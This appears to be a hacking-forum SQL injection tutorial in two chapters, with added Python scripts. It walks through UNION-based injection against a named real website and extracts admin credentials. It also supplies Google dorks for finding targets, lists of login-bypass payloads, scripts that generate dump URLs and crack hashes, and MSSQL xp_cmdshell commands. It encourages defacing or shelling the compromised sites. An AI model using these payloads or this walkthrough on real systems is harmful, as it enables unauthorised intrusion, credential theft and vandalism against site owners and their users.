#Chapter 3: Super Detailed SQL injection TUTORIAL#



Tutorial by Zer0Freak


Zer0Freak SQLi Tutorials
Difficulty: Basic Level 2 and Intermediate
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 25-30 min (reading thoroughly will help you understand better)
The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we're gonna learn today.
Previous tutorial: Bypassing Login Pages with SQL injection (Basics and Intermediate)
  • There are many types of SQL injection when it comes to web hacking
  • What we learned in the previous tutorial was only the basics, where we used it to bypass admin/user logins.
  • However, what will you do if you can't bypass the login even though the site is vulnerable to SQL injection?
  • Well, the answer is simple. You do the process in your URL/address bar instead of in the text boxes of an admin/user login page.



Common Types of SQL injection are:
Code:
UNION Based SQL injection
String Based SQL injection
Error Based SQL injection
Double Query SQL injection
Blind SQL injection
MsSQL injection
What we are going to learn today is what we call UNION Based SQL injection
Alright, before we start we need to know how a website works when it stores login information/pages/pictures/etc. in its database
Let's just say that our website's URL looks like this:
"http://www.site.com/index.php?id=5"
Notice at the end of the URL, "id=5"
This is what the query behind that page looks like (the "5" is pasted straight from the URL into the SQL text):
PHP Code:
SELECT * FROM index WHERE id=5
Alright, now that you know a bit of how the website works, let's get hacking



Step1: Finding the vulnerability in a website
It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com on its own.
To hack a website, you need to scan it yourself by clicking links and find something like "index.php?id=XXX", where "XXX" is an integer (number) or string (word) that the page passes to its database.
Alright, the way to find sites vulnerable to SQLi is by using Google dorks.
If you don't know how to use dorks, visit Part 1 of this project to learn all about them
Once you've found a site vulnerable to SQLi, it's time to execute queries.
For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.

Try browsing the website and see if you can find links like "index.php?id=xxx"
It can be anything like "details.php?id=xxx" or "gallery.php?id="
Just find an address with a number at the end of the URL
Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"

Now, to test for the vulnerability, ADD a quote " ' " at the end of the URL, i.e. right after the integer or string
So it'll look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'

Now you'll notice an error saying
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
This shows that the website is very likely vulnerable to SQL injection.
How is this possible?
Look at the query when we add a quote " ' "
PHP Code:
SELECT * FROM article WHERE id=51'
Notice that the quote we typed went straight into the SQL text, leaving an unmatched ' that MySQL cannot parse.
That is why it returns a syntax error: the id value is not validated or escaped before it reaches the database.
Now that we know the website is vulnerable to SQL injection, let's advance to the next process



Step2: Finding the number of columns a website has

This is the part most people get wrong.
To get to the point, we are going to find how many columns the page's query selects, by watching for error/no-error responses.
Alright, let's get started.
The query we'll be appending is "order by X--" where "X" is an integer. ORDER BY X sorts the result by its Xth column, so it succeeds while X is at most the column count and fails as soon as X is larger.
Start by entering "order by 25--"
Enter it at the end of the URL, so it'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
Error: there are not 25 columns, so the count is less than 25

Now lets try "order by 20--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
Still an error, so there are fewer than 20 columns

How about we go down a bit to "order by 5--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
Aha! No error. So there are at least 5 columns; let's see if there are more than 5

Now lets go up to "order by 11--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
Hmm, no error. So there are at least 11 columns, and there could be more

See if we can increase to "order by 12--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
Error! So the last number that returned no error is 11
Therefore, the page's query selects 11 columns

Tips:
An error while scanning for the number of columns looks like "Unknown column '12' in 'order clause'" (if the site hides database errors, the page may simply break or come back blank instead)
No error shows the page as normal



Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
First off, we need to know what "UNION SELECT" means
Let's say we have 2 tables, "users" and "admin"
Basically, UNION combines the result rows of two SELECT statements into one result set, as long as both SELECTs return the same number of columns (that's why we counted them in Step 2).
Look at this query
PHP Code:
SELECT * FROM users UNION SELECT * FROM admin
If we perform the UNION SELECT statement, we get both the users and the admin rows from their database in one result
The point is that UNION SELECT lets us append rows of our own choosing to the page's query, so the page renders the information we ask for
If you want to find vulnerable columns, use UNION SELECT
If you want to find the version of the database, UNION SELECT
If you want admin information! use UNION SELECT
Alright, now that we know something about UNION, let's continue.

Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's how our query will look like
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
This is what you would normally do if you use UNION function while SQL injecting a website

Focus on a pattern like this: "index.php?id=-X UNION SELECT N--"
Where "X" is the page's original integer/string, "N" is the list 1,2,...,up to the column count you found in Step 2, and the two hyphens " -- " comment out whatever SQL the page would otherwise add after our input. The extra hyphen " - " in front of "X" (id=-51) makes the original WHERE clause match nothing, so the page's own row disappears and the row our UNION SELECT adds is the one that gets displayed.



Step4: Random numbers appear on screen, the next step
Alright, I'm pretty sure you'll find a few numbers showing up on the page.
These are what we call "vulnerable columns": the positions in the SELECT whose values the page actually renders, so whatever expression we put at that position in our UNION SELECT gets printed on screen.
Pick the number that appears at the very top of the page (always the one at the very top)
So, in this case we have number "8"
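To see Steps 1 to 4 working end to end, here is an added example (my code, not from the tutorial) that simulates a page built exactly like the tutorial's `SELECT * FROM article WHERE id=...` against a throwaway SQLite database with constructed sample data. The names `newsdetail`, `vulnerable_page` and `safe_page` are made up for the simulation; SQLite's error text differs from MySQL's, but the logic (quote test, ORDER BY binary search, UNION markers) is the same, and the parameterised `safe_page` at the end shows why binding the value closes all three.

```python
"""Simulation of the quote test, ORDER BY column count and UNION marker
steps against a SQLite database with constructed sample data.
Added example, not code from the original tutorial."""
import sqlite3

NUM_COLS = 11  # the tutorial's example page selected 11 columns


def make_db():
    """Constructed stand-in for the site's news table: id plus 10 text columns."""
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(["id INTEGER"] + [f"col{i} TEXT" for i in range(2, NUM_COLS + 1)])
    conn.execute(f"CREATE TABLE newsdetail ({cols})")
    values = ", ".join(["51"] + [f"'news{i}'" for i in range(2, NUM_COLS + 1)])
    conn.execute(f"INSERT INTO newsdetail VALUES ({values})")
    return conn


def vulnerable_page(conn, id_param):
    """The bug: the id parameter is pasted into the SQL text, just like the
    tutorial's SELECT * FROM article WHERE id=51. The page renders only the
    2nd and 8th columns of the SELECT and echoes database errors."""
    sql = f"SELECT * FROM newsdetail WHERE id={id_param}"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"
    if row is None:
        return ""
    return f"{row[1]} | {row[7]}"


def safe_page(conn, id_param):
    """The fix: check the type and bind the value; the SQL text never changes."""
    try:
        id_value = int(id_param)
    except ValueError:
        return ""
    row = conn.execute("SELECT * FROM newsdetail WHERE id=?", (id_value,)).fetchone()
    return "" if row is None else f"{row[1]} | {row[7]}"


def quote_test(page):
    """Step 1: a lone quote after the id breaks the SQL if it is not escaped."""
    return page("51'").startswith("ERROR")


def find_column_count(page, max_cols=64):
    """Step 2: ORDER BY n works while n <= column count and errors beyond it,
    so binary search instead of the tutorial's hand-picked 25, 20, 5, 11, 12."""
    def works(n):
        return not page(f"51 ORDER BY {n}--").startswith("ERROR")
    if works(max_cols):
        raise ValueError("no ORDER BY error up to max_cols; errors hidden?")
    lo, hi = 1, max_cols          # invariant: works(lo) is True, works(hi) is False
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if works(mid):
            lo = mid
        else:
            hi = mid
    return lo


def find_displayed_columns(page, ncols):
    """Steps 3-4: a negative id empties the real result, and UNION SELECT with
    a distinct marker per column shows which positions the page renders."""
    markers = ",".join(f"'<m{i}>'" for i in range(1, ncols + 1))
    out = page(f"-51 UNION SELECT {markers}--")
    return [i for i in range(1, ncols + 1) if f"<m{i}>" in out]


def run_attack(page):
    """Chain steps 1-4; returns (quote_error, column_count, displayed_columns)."""
    if not quote_test(page):
        return (False, None, [])
    n = find_column_count(page)
    return (True, n, find_displayed_columns(page, n))


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", run_attack(lambda p: vulnerable_page(conn, p)))
    print("parameterised:", run_attack(lambda p: safe_page(conn, p)))
```

Against `vulnerable_page` the chain reports the quote error, 11 columns and columns 2 and 8 as displayed, matching the tutorial's numbers; against `safe_page` the quote test fails and the UNION payload returns an empty page, because the input can only ever be a value, never SQL.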
Now you might be asking, what can I do with a vulnerable column?
Well here's what you can get-- INFORMATION!
You need a lot of information to study from the website, here are a couple of examples.

Replace the vulnerable column i.e number 8 with a statement
Statements:
Code:
@@version, version()
database(),
user(),
@@hostname
@@datadir
Their functions
@@version/version() = version of the MySQL server
database() = name of the database the website is currently using
user() = the MySQL account (user@host) the web application connects as
@@hostname = hostname of the database server
@@datadir = path of the MySQL data directory on the server

To find the version of the database in the website, replace the vulnerable column i.e. number 8 with "@@version" or "version()"
It'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
Results:
Code:
5.1.52-log
So the MySQL version is 5.1, which is good because version 5.0 and later have the information_schema database, which lets us list tables and columns instead of guessing them.
Note:
MySQL version less than 5 "<5" (i.e. 4.x) = no information_schema, so you need to guess table names (a bit of hard work)
MySQL version 5 or greater = easy to inject with information_schema and group_concat

If you ever want to SQLi a website with version <5, then you can guess the table names with the list below
Code:
user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin
We'll learn how to get the tables in the next step.
But for now, let's see what we can get with the other statements
Let's try all the statements at once, shall we?
The URL will look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,10,11--
Results:
Code:
32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
3
We have almost every piece of information we need about the website
Look closely here: we used the function "group_concat"
Here's its function:
group_concat = concatenates the values it is given (and, across rows, the value from every row) into one string, so several results fit into the single displayed column. Ex. group_concat(database())
Note: group_concat was added in MySQL 4.1, so it won't work on older versions



Step5:Getting the table names
What are tables?
Tables contain columns and columns contain the data
It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
Alright, first let's look up the pieces we're gonna use to extract table names (Important)
Code:
group_concat = concatenates many rows into one string so they fit in the one displayed column
table_name = the column of information_schema.tables that holds each table's name
from = names the table the SELECT reads from
information_schema.tables = the built-in table (MySQL 5.0+) that lists every table on the server
table_schema = the column holding the name of the database each table belongs to
database() = the database the website is currently using
0x0a = hex for a newline character, used to put each table name on its own line
Now lets combine those functions and make up a query that will give us the table names
So, here's what our link will look like:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
and then we added
"from information_schema.tables where table_schema=database()"
after the last column number, just before the two hyphens
Results on table names:
Code:
pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
Alright, now that we've found the tables, what you have to do is
find the tables where user/admin information is stored
In this case, "tbladmin" seems to have admin information stored in it.
It's all about predicting what's behind every table name you see
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and Add the following
Vulnerable Column = replace with "group_concat(table_name,0x0a)"
After the last column = Add "from information_schema.tables where table_schema=database()--"
Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string



Step6:Getting Columns from Tables
Alright, obviously our next task is to get the column names from a specific table, which in our case is "tbladmin"
To do this, we're gonna have to alter some queries a bit
Now look closely at this syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
Here's what we replaced:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x74626c61646d696e--"
Now that you know the replacements in our syntax, you might still be wondering what's up with the last part, where we entered "0x74626c61646d696e--"
This is a hex literal.
MySQL treats a value written with a "0x" prefix as a string of bytes, so 0x74626c61646d696e means exactly the same as 'tbladmin' but needs no quote characters. That matters because quotes are what filters like magic_quotes or addslashes() escape, and a quote is what broke the query back in Step 1.
I'll explain this briefly. So our table name was "tbladmin"
To use that table name in the syntax above, we convert it to hex
In order to do that, visit this website:
http://www.swingnote.com/tools/texttohex.php
It's a text to hex converter
Enter "tbladmin" in the text box and hit convert
You'll notice the result will be "74626c61646d696e" (that's the hex of each character)
Now, to make MySQL read it as a string, add "0x" at the beginning
So it will be:
Code:
0x74626c61646d696e

Now that you know how hex works, let's look at the pieces we replaced and their uses (Important)
Code:
group_concat(column_name,0x0a) = concatenates the column names we're extracting, one per line
information_schema.columns = the built-in table that lists every column of every table
table_name = the column we filter on, so only columns of one specific table are returned
0xHEX_Code_Table = the specific table name converted to a hex literal
Results after extracting column names from tables:
Code:
adminid ,username ,password ,dom
Now that we've got the columns from that table, it's time to extract the information.
What we're gonna need here is obviously only the "username" and "password"



Step7:Getting Data from Columns
Alright, lets extract the information
Look closely at the syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
Keep this formula-like syntax in your mind whenever you want to extract data from columns
Code:
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat(columnName,0x3a,columnName,0x0a) from tablename--
Where "X" is the page's original integer/string preceded by a hyphen ( - ), "N" stands for the other column numbers (the group_concat goes in the position of the displayed column), "columnName" is the column you want to extract data from, "tablename" is the table you extract it from, and two hyphens ( -- ) go at the end

Now for revising,
column names = username, password
separator = 0x3a (a hex for a colon " : ")
table name = tbladmin
Once you execute that syntax, you get the username and password separated by a colon
Results after executing the syntax:
Code:
ishir:ishir123
Username: ishir
Password: ishir123
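Steps 5, 6 and 7 are the same URL with three different expressions, so here is an added example (my code, not the tutorial's) that generates those URLs from the column count and displayed column found earlier, does the hex conversion the tutorial sends you to a website for, and parses the `group_concat` blob the page renders back into rows. `http://www.site.com/index.php` and the parameter name `id` are placeholders; the original id 51 and the `username`/`password` sample rows are taken from the tutorial's own example.

```python
"""Builders for the information_schema and data-dump payloads of steps 5-7,
plus a parser for the group_concat output. Added example, not tutorial code;
the base URL and parameter name are placeholders."""


def mysql_hex_literal(text):
    """'tbladmin' -> '0x74626c61646d696e'. MySQL reads 0x.. as a string, so the
    table name needs no quote characters that a filter could escape."""
    return "0x" + text.encode("utf-8").hex()


def union_url(base_url, param, ncols, displayed, expr, from_clause="", orig_id=51):
    """param=-orig_id UNION SELECT 1,..,expr,..,ncols [from ...]-- with expr
    placed at the 1-based position of the column the page renders."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[displayed - 1] = expr
    tail = f" {from_clause}" if from_clause else ""
    return f"{base_url}?{param}=-{orig_id} UNION SELECT {','.join(cols)}{tail}--"


def tables_url(base_url, param, ncols, displayed):
    """Step 5: one table name per line (0x0a) from the current database."""
    return union_url(base_url, param, ncols, displayed,
                     "group_concat(table_name,0x0a)",
                     "from information_schema.tables where table_schema=database()")


def columns_url(base_url, param, ncols, displayed, table):
    """Step 6: column names of one table; the table name goes in as hex."""
    return union_url(base_url, param, ncols, displayed,
                     "group_concat(column_name,0x0a)",
                     f"from information_schema.columns where table_name={mysql_hex_literal(table)}")


def dump_url(base_url, param, ncols, displayed, table, fields):
    """Step 7: field1:field2:... per row (0x3a between fields, 0x0a after each row)."""
    expr = "group_concat(" + ",0x3a,".join(fields) + ",0x0a)"
    return union_url(base_url, param, ncols, displayed, expr, f"from {table}")


def parse_group_concat(text, row_sep="\n", field_sep=":"):
    """Turn the rendered 'a:b\\n,c:d\\n' blob back into rows. group_concat puts a
    comma between rows and our 0x0a ends each row, hence the stripped commas."""
    rows = []
    for chunk in text.split(row_sep):
        chunk = chunk.strip().strip(",").strip()
        if chunk:
            rows.append(tuple(chunk.split(field_sep)))
    return rows


if __name__ == "__main__":
    base, param = "http://www.site.com/index.php", "id"
    print(tables_url(base, param, 11, 8))
    print(columns_url(base, param, 11, 8, "tbladmin"))
    print(dump_url(base, param, 11, 8, "tbladmin", ["username", "password"]))
    print(parse_group_concat("ishir:ishir123\n"))  # constructed sample output
```

One caveat a practitioner needs: MySQL truncates `group_concat()` output at `group_concat_max_len` (1024 bytes by default), so a database with many tables, or a table with many users, will come back cut off; when that happens, page through the rows with `limit N,1` in the `from` clause instead of one `group_concat`.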



Special cases: Hashed Usernames and Passwords
Most websites store their passwords hashed, very commonly as unsalted MD5
In this case you'll need to crack them: guess candidate passwords, hash each one the same way and compare against the stored hash.
Some websites will do this for you from their precomputed tables.
Here's a list of hash cracking websites:
Code:
www.md5decrypter.co.uk/
www.md5this.com/
www.md5crack.com/
http://hashchecker.de/find.html
An MD5 Hash will look like this:
Code:
21232f297a57a5a743894a0e4a801fc3 -- 32 characters
A SHA-1 Hash will look like this:
Code:
d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
I'll make up a detailed tutorial on Hash cracking soon.
But for now, refer to this for a little knowledge about hashes
http://www.hackforums.net/showthread.php?tid=1393830
Credits to Haxor and Insidepro
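Here is an added example (my code, not the tutorial's, and not the Zer0Freak identifier released further down this page) that does the two things this section describes: recognise the hash format from its shape, using the same labels as that identifier's list, and run the dictionary attack that the "decrypter" websites run against their precomputed tables. The wordlist and the `$1$`/`$P$` sample strings are constructed; salted formats are recognised but deliberately not cracked here because each needs its own salt-aware algorithm.

```python
"""Identify a hash by its shape and try a dictionary attack with hashlib.
Added example, not from the tutorial; the wordlist is constructed."""
import hashlib
import re

# (label, pattern) in the order they are tried; prefixed formats first so a
# MySQL5 '*...' value is not mistaken for a plain SHA-1.
HASH_PATTERNS = [
    ("MySQL5", re.compile(r"^\*[0-9A-Fa-f]{40}$")),
    ("MD5(Unix)", re.compile(r"^\$1\$")),
    ("MD5(APR)", re.compile(r"^\$apr1\$")),
    ("MD5(phpBB3)", re.compile(r"^\$H\$")),
    ("MD5(Wordpress)", re.compile(r"^\$P\$")),
    ("SHA-256(Unix)", re.compile(r"^\$5\$")),
    ("SHA-512(Unix)", re.compile(r"^\$6\$")),
    ("MySQL", re.compile(r"^[0-9A-Fa-f]{16}$")),      # pre-4.1 PASSWORD()
    ("MD5", re.compile(r"^[0-9A-Fa-f]{32}$")),
    ("SHA-1", re.compile(r"^[0-9A-Fa-f]{40}$")),
    ("SHA-256", re.compile(r"^[0-9A-Fa-f]{64}$")),
    ("SHA-512", re.compile(r"^[0-9A-Fa-f]{128}$")),
]


def identify_hash(digest):
    """Return the first label whose pattern matches, or 'unknown'."""
    digest = digest.strip()
    for label, pattern in HASH_PATTERNS:
        if pattern.match(digest):
            return label
    return "unknown"


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def sha1_hex(text):
    return hashlib.sha1(text.encode()).hexdigest()


def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()


def mysql5_hash(text):
    """MySQL 4.1+ PASSWORD(): '*' + SHA1(raw SHA1(pw)) as upper-case hex."""
    inner = hashlib.sha1(text.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# unsalted formats we can recompute directly from a candidate password
UNSALTED = {"MD5": md5_hex, "SHA-1": sha1_hex, "SHA-256": sha256_hex, "MySQL5": mysql5_hash}


def crack_hash(digest, wordlist):
    """Hash every candidate and compare; returns the plaintext or None.
    Salted formats ($1$, $6$, phpass ...) are skipped: they need the salt."""
    func = UNSALTED.get(identify_hash(digest))
    if func is None:
        return None
    target = digest.strip().lower()
    for word in wordlist:
        if func(word).lower() == target:
            return word
    return None


# constructed wordlist for the demo
WORDLIST = ["123456", "password", "letmein", "admin", "ishir123"]

if __name__ == "__main__":
    for h in ("21232f297a57a5a743894a0e4a801fc3",
              "d033e22ae348aeb5660fc2140aec35850c4da997",
              mysql5_hash("ishir123")):
        print(h, identify_hash(h), crack_hash(h, WORDLIST))
```

Both sample hashes from the text above crack to "admin" with this wordlist. The length-based identification is a heuristic only: a 32-hex-character value could equally be an MD4 or NTLM hash, and a 40-character one a RIPEMD-160, so when the dictionary attack fails for the obvious format, try the others before concluding the password is strong.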




Last Step: Finding the admin page and logging in for the goods
Alright, now that we have our admin login info
Username: ishir
Password: ishir123
It's time to find the login pages
To do this, you can use Admin Page Finders
Here's some you can use
>>Scorpion Admin Page Finder<<
http://sc0rpion.ir/af/
>>Outlaw Admin Page Finder<<
http://www.tools.th3-0utl4ws.com/admin-finder/
>>Napsterakos Admin Page Finder<<
http://www.hackforums.net/showthread.php...ight=HaviJ
>>HaviJ Injector/Cracker and Admin page finder<<
http://www.hackforums.net/showthread.php...age+finder
Alright after scanning the website for admin pages, you should see something like this:
Code:
http://www.leadacidbatteryinfo.org/admin/
Now all you have to do is enter the admin details you extracted from their databases and login as an admin!
However, some websites could already be hacked and messed up
In our case, this website was already messed up in such a way that you can't log in as an admin anymore.
These are just the basics of SQL injection.
There are lots of websites to hack and more to practice with.
Just so that you'll get a clear view of this tutorial, look up a demonstration video on how I inject a site with UNION Based/Normal SQL injection:





Extras:
Acunetix Web Vulnerability Scanner:
Features: Scans a specific website of your choice for vulnerabilities and directories too
Download it by clicking here

SQL Poizon:
Scans for dorks, crawls a lot of websites at a time, organized work space for SQL injection, and a built-in browser
http://www.hackforums.net/showthread.php...SQL+poizon

SQL injection vulnerable lists:
Lists by iTz Ryannn x
http://pastebin.com/y2jD5Fgz

Lists made by Dyme
http://pastebin.com/kVMYX0Eh



Thanks for reading this tutorial; I hope you enjoyed it and learned a lot from it
End of Chapter 3
Upcoming chapter: Error Based SQL injection Detailed
Need any help: zerofreak@live.com
Please stay tuned to MegaProjectSQLi by Zer0freak for more tutorials.
Have a great day
 

#Chapter 2: Basic SQL injection with Login Queries#


Tutorial 100% Made by Zer0Freak

Bypassing Login pages on websites using SQL injectable queries


Level: Beginners and Intermediate
Requirements: Patience and strategy
Alright, in this tutorial we'll be learning how to bypass login pages with the help of MySQL injection using login queries.
This is Chapter 2 of the MegaProject.
Please visit Chapter 1 if you haven't seen it yet
Also, if you need some questions answered, you can find solutions on my FAQ Thread: http://www.hackforums.net/showthread.php?tid=1993481

What is SQL injection?
Answer: Basically, it's a process where you get a website to run SQL of your choosing in order to extract information such as log-in details, users, etc. from the website's database, for either personal gain or random use.
There are many types of queries that can be injected in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is a basic SQL injection string that is typed into a login page.
Example:
Code:
Username: admin
Password: ' or '1'='1
When you enter the password "' or '1'='1" on a vulnerable website, there's a chance you gain access.
How does it happen? Look at the SQL the site builds when we submit that:
PHP Code:
SELECT * FROM users WHERE username='admin' AND password='' or '1'='1'
In the password field, the first quote ' closes the password string early, so the rest of what we typed (or '1'='1) is read as SQL, not as a password.
Because '1'='1' is always true, and AND binds tighter than OR, the WHERE clause matches every row in the table; the login code gets a row back (usually the first user, which is often admin) and treats the login as successful.
However, some websites filter out these strings, so it's best to try different ones too. You can find some below.
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we
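To make the explanation above concrete, here is an added example (my code, not the tutorial's) that builds the same login query by string concatenation against a throwaway SQLite database with two constructed accounts, shows what `' or '1'='1` and `admin' --` do to it, and puts the parameterised version beside it so you can see the same inputs fail. SQLite is used so it runs offline; the `#` comment variant in the lists below is MySQL-only and is not shown here.

```python
"""Simulated login check showing why ' or '1'='1 and admin' -- work and why a
bound parameter stops them. Added example, not tutorial code; the users
table and its two accounts are constructed."""
import sqlite3


def make_users():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return conn


def built_sql(username, password):
    """The text the vulnerable version sends: both fields pasted into the SQL."""
    return (f"SELECT username FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def vulnerable_login(conn, username, password):
    """Returns the account the site would log you in as, or None. The site
    takes the first row that comes back, so an always-true WHERE is a login."""
    try:
        row = conn.execute(built_sql(username, password)).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same check with bound parameters: the input can only ever be data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_users()
    for user, pw in [("admin", "s3cret"), ("admin", "' or '1'='1"), ("admin' --", "x")]:
        print(built_sql(user, pw))
        print("  vulnerable ->", vulnerable_login(conn, user, pw),
              "| safe ->", safe_login(conn, user, pw))
```

Note the two different mechanisms: `' or '1'='1` keeps the query syntactically complete and makes the WHERE clause true for every row, while `admin' --` comments the password check away entirely, which is why it works even when the password column is hashed.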

Step1: Finding websites with Login Pages
Alright, our basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass them.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial: http://www.hackforums.net/showthread.php?tid=2059771
In this tutorial, we can use these dorks:
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
If you want to find more dorks when using this method, you can find them here:
Code:
http://pastebin.com/ZjxpivV3

Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, because most sites have an admin account stored in their database
Code:
Username: admin
Password: ' or 0=0 --
Didn't work? No worries, there's more to that than just a single query
Here's a list of password strings you can use to try to inject the site.
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
Credits to RealSteal for some of the codes mentioned above.
Note: Sometimes this is not the best way of hacking websites with SQL injection, but I guarantee that with patience you'll become a successful SQL injector and get used to this method.

Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If you would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon. Now you might want to watch the video so that you get the idea of how I log in as an Administrator on a SQLi vulnerable website





Extras:
Common Password Queries:
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

The strings below are a general cheat sheet and are not limited to MySQL or to "version 5": the @@version, xp_cmdshell, sysobjects/syscolumns and OPENROWSET lines are MS SQL Server, the sysibm.sysdummy1 and syscat lines are DB2, the pg_*, current_setting() and pg_sleep() lines are PostgreSQL, the dbmsinfo() lines are Ingres, and the rest are MySQL. On MySQL, UNION works from version 4.0, GROUP_CONCAT from 4.1, and the information_schema queries from 5.0.
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
